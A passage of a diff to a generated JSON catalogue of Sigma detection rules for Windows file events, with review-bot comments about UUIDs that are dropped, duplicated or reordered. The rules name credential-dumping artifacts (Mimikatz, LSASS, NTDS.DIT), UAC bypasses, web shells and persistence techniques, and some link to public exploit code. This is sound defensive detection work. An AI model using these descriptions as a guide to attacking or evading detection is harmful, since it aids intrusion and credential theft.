"tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", - "value": "PsExec Service File Creation" - }, - { - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/02/21", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_event_win_tsclient_filewrite_startup.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" ], "tags": [ "attack.command_and_control", "attack.t1219" ] }, - "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", - "value": "Hijack Legit RDP Session to Move Laterally" - }, - { - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", - "value": "UAC Bypass Using Consent and Comctl32 - File" + "uuid": 
"9711de76-5d4f-4c50-a94f-21e4e8f8384d", + "value": "Installation of TeamViewer Desktop" }, { "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", 
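Review bot: Nine of the ten rule entries this hunk deletes (among them `PsExec Service File Creation` 259e5a6a-…, `Hijack Legit RDP Session to Move Laterally` 52753ea4-… and `UAC Bypass Using Consent and Comctl32 - File` 62ed5b55-…) are not re-added anywhere in view, and only `Installation of TeamViewer Desktop` takes their place, so the regenerated galaxy loses those detections unless each UUID reappears elsewhere in the diff. Only `Drop Binaries Into Spool Drivers Color Folder` (ce7066a6-…) visibly comes back, in the hunk at +25368, which suggests the generator reordered entries rather than pruned them, but that cannot be confirmed from this hunk. Since the file is generated, the cheap check is a UUID set comparison between the two revisions, e.g. `jq -r '.values[].uuid' clusters/sigma-rules.json | sort` on each and diff the outputs: a UUID present only in the old revision is a dropped rule, one listed twice in the new revision would collide on galaxy import. The new TeamViewer entry itself is consistent with its neighbours (array-valued `falsepositive`, `attack.t1219` tag, `logsource.*` pair).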
@@ -24693,6 +25368,252 @@ "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6", "value": "UAC Bypass Using .NET Code Profiler on MMC" }, + { + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.44077" + ] + }, + "uuid": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "value": "CVE-2021-44077 POC Default Dropped File" + }, + { + "description": "Detects file writes of WMI script event consumer", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", + "falsepositive": [ + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + ], + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ] + }, + "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "value": "WMI Persistence - Script Event Consumer File Write" + }, + { + 
"description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ] + }, + "uuid": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "value": "Potential DCOM InternetExplorer.Application DLL Hijack" + }, + { + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "creation_date": "2020/03/19", + "falsepositive": [ + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" + ], + "filename": "file_event_win_susp_desktop_ini.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "81315b50-6b60-4d8f-9928-3466e1022515", + "value": "Suspicious desktop.ini Action" + }, + { + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_spool_drivers_color_drop.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "value": "Drop Binaries Into Spool Drivers Color Folder" + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "meta": { + "author": "Alexander Rausch", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_redmimicry_winnti_filedrop.yml", + "level": "high", + 
"logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "value": "RedMimicry Winnti Playbook Dropped File" + }, + { + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "System administrators managing certififcates." + ], + "filename": "file_event_win_susp_pfx_file_creation.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/14", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "value": "Suspicious PFX File Creation" + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Unknown", + "Possibly some Microsoft Edge upgrades" + ], + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + 
"https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event" + }, + { + "description": "Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_mimikatz_kirbi_file_creation.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://cobalt.io/blog/kerberoast-attack-techniques", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558" + ] + }, + "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "value": "Mimikatz Kirbi File Creation" + }, + { + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). 
These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context", + "meta": { + "author": "frack113", + "creation_date": "2022/11/18", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_net_cli_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "value": "NET CLR Binary Execution Usage Log Artifact" + }, { "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", "meta": { @@ -24706,8 +25627,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", + "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], 
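Review bot: The `Suspicious PFX File Creation` (dca1b3e8-…) and `Drop Binaries Into Spool Drivers Color Folder` (ce7066a6-…) entries added in this hunk carry the same UUIDs as copies deleted earlier in this diff (the PFX entry just before the +25299 hunk, the spool-drivers entry in the hunk at -24404), so this is a relocation and the regenerated file must contain each UUID exactly once; `jq -r '.values[].uuid' clusters/sigma-rules.json | sort | uniq -d` should print nothing before merge. The relocated PFX entry also returns with its two non-SigmaHQ `refs` in the opposite order from the removed copy, and the one-line hunks at +25299 and +25627 change nothing but `refs` order, which points to non-deterministic ordering in the generator; emitting `refs` in a stable order (source order or sorted) would keep future regenerations down to real changes. The remaining additions look consistent with their neighbours (array-valued `falsepositive`, `attack.*` tags, `level` values drawn from the usual low/medium/high/critical set).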
@@ -24719,6 +25640,477 @@ "uuid": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "value": "UAC Bypass Using EventVwr" }, + { + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "meta": { + "author": "Florian Roth (rule), MSTI (query, idea)", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_exchange_webshell_drop.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "value": "Suspicious ASPX File Drop by Exchange" + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "meta": { + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2017/11/10", + "falsepositive": "No established falsepositives", + "filename": "file_event_win_mal_adwind.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "value": "Adwind RAT / JRAT File Artifact" + }, + { + "description": "Detects the creation of new Outlook form which can contain malicious code", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_outlook_newform.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_newform.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.003" + ] + }, + "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "value": "Outlook Form Installation" + }, + { + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. 
Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "meta": { + "author": "@pbssubhash", + "creation_date": "2022/12/08", + "falsepositive": [ + "Rare legitimate dump of the process by the operating system due to a crash of lsass" + ], + "filename": "file_event_win_lsass_shtinkering.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f625", + "value": "LSASS Process Dump Artefact In CrashDumps Folder" + }, + { + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "meta": { + "author": "SecurityAura", + "creation_date": "2022/11/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_remote_cred_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", + "https://github.com/Porchetta-Industries/CrackMapExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "value": "Remote Credential Dump" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish 
an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_anydesk_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", + "value": "Anydesk Temporary Artefact" + }, + { + "description": "Detects the creation of the default output filename used by the wmicexec tool", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_wmiexec_default_filename.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1047" + ] + }, + "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "value": "Wmiexec Default Output File" + }, + { + "description": "A office file with macro is created from a commandline or a 
script", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_macro_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", + "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "b1c50487-1967-4315-a026-6491686d860e", + "value": "Dump Office Macro Files from Commandline" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_creation_scr_binary_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.002" + ] + }, + "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", + "value": "Suspicious Screensaver Binary File Creation" + }, + { + "description": "Attempts to detect PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 
2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE", + "creation_date": "2021/10/24", + "falsepositive": [ + "Unknown", + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + ], + "filename": "file_event_win_powershell_startup_shortcuts.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "value": "PowerShell Writing Startup Shortcuts" + }, + { + "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.execution" + ] + }, + "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "value": "Created Files by Office Applications" + }, + { + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_csharp_compile_artefact.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ] + }, + "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", + "value": "Dynamic C Sharp Compile Artefact" + }, + { + 
"description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + ], + "filename": "file_event_win_startup_folder_file_write.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75", + "value": "Startup Folder File Write" + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "value": "UAC Bypass Using NTFS Reparse Point - File" + }, + { + "description": "Detects suspicious creations of a file named ntds.dit, e.g. 
by a PowerShell parent or in a suspicious directory or a suspicious one liner", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_ntds_dit.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "value": "Suspicious NTDS.DIT Creation" + }, + { + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_ntds_exfil_tools.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": 
"3a8da4e0-36c1-40d2-8b29-b3e890d5172a", + "value": "Suspicious NTDS Exfil Filename Patterns" + }, + { + "description": "Detects default lsass dump filename from SafetyKatz", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/07/24", + "falsepositive": [ + "Rare legitimate files with similar filename structure" + ], + "filename": "file_event_win_ghostpack_safetykatz.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ghostpack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", + "value": "SafetyKatz Default Dump Filename" + }, + { + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "meta": { + "author": "Florian Roth, Sittikorn S", + "creation_date": "2021/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_winword_cve_2021_40444.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", + "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587" + ] + }, + "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "value": "Suspicious Word Cab File Write CVE-2021-40444" + }, + { + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/07", + 
